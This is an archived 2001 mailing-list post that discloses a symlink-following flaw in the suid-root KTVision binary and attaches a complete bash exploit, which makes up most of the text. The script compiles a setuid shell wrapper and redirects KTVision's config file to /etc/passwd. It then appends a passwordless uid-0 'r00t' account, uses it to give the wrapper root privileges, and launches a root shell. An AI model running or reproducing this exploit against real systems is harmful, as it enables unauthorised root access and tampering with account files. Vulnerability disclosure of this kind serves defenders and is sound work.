Hi ppl,
the subject already states the problem: there is a symlink follow
problem in the (in many distributions suid root) ktvision binary <=
0.1.1-271.
It is discouraging that nowadays such trivial symlink attacks are still
possible. No comment anymore. In order to be complete: a bash script
demonstrating this vulnerability is attached below.
Ihq.
------------------------- ktv.sh -------------------------------
#!/bin/bash
link=/home/paul/.kde/share/config
linkto=/etc/passwd
target=/opt/kde/bin/ktvision
echo ""
echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
echo ""
if ! test -u $target ; then
echo "[-] $target not found"
exit 1
fi;
echo "[+] $target found"
rm -f sush*
cat <<__DUPA__>>sush.c
#include <stdio.h>
main()
{
setuid(geteuid());
setgid(getegid());
execl("/bin/bash", "/bin/bash", NULL);
}
__DUPA__
echo " compiling sush"
res=$(gcc sush.c -o sush)
if test "$res" != "" -o ! -x sush ; then
echo "[-] failed"
rm sush* ktvback.*
exit 2;
fi;
echo "[+] success"
cp $linkto ktvback.$$
mkdir -p $link
rm -f $link/ktvisionrc
ln -s $linkto $link/ktvisionrc
echo ""
echo -n "now running... (ensure that X is up and running)"
$target >/dev/null 2>&1 &
cpid=$!
declare -i cnt
declare -i max
cnt=0
max=60
while ! test -O $linkto ; do
sleep 1;
printf " %.2d" $cnt
cnt=$(($cnt+1))
if test $cnt -ge $max ; then
echo ""
echo ""
echo "[-] FAILED"
rm sush* ktvback.*
exit 2;
fi;
done;
kill -9 $cpid >/dev/null 2>&1
rm $link/ktvisionrc
echo ""
echo ""
echo "[+] SUCCESS, creating sush"
echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
echo ""
su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
ktvback.$$ $linkto; chown 0.0 $linkto"
rm ktvback.* sush.c
if ! test -u sush ; then
echo " hm strange error"
rm sush* ktvback.*
exit 1
fi;
echo ""
echo "starting ./sush"
./sush
#!plonk
This archive was generated by hypermail 2b30 : Fri Jun 22 2001 - 15:35:04 PDT